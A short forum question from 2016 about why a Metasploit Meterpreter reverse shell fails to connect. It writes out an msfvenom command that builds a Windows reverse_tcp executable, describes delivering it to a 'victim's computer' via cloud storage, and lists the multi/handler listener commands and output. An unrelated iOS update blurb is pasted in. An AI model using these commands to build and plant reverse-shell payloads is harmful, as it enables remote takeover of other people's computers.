Can't Get Metasploit Session.

Aug 25, 2016 12:29 PM

Hello, i have little problem in Metasploit. I can't get metasploit session. Metasploit is still listening. So i will tell you what i am doing.

Creating Executable

Before all i create executable with msfvenom. Command finally look like

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > file.exe

Then I upload file on cloud storage and download this file from the victim's computer.

Starting Metasploit

I start metasploit normally with msfconsole command.

Then i just type use multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST

exploit

Handler failed to bind to :4444:- -

Started reverse TCP handler on 0.0.0.0:4444

Starting the payload handler. . .

Run Exe File on Victim's Computer

Then i go to the victim's computer and i run file.exe

Still no change. Still starting payload handler.

I left it for 30 minutes and nothing.

Is it because of my computer is running on windows 10? or because victim have firewall?

I turned off the firewall and antivirus on my computer.

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Comments

No Comments Exist

Be the first, drop a comment!